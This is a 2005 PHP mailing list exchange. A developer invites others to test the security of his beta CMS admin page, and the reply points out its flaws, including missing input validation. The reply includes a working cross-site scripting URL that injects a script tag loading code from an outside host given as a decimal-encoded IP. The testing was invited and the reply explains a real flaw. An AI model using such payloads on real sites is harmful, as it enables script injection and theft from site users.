> on 05/23/2005 06:19 AM Andy Pieters said the following: > >> I am looking at where I can get my system tested for penetration. >> >> In case someone here would like to have a go >> >> This is the url >> >> http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ >> >> It is actually a kind of CMS system so if someone gets in, create a >> page with the cms as proof.
You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v And you are not doing any input validation either. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
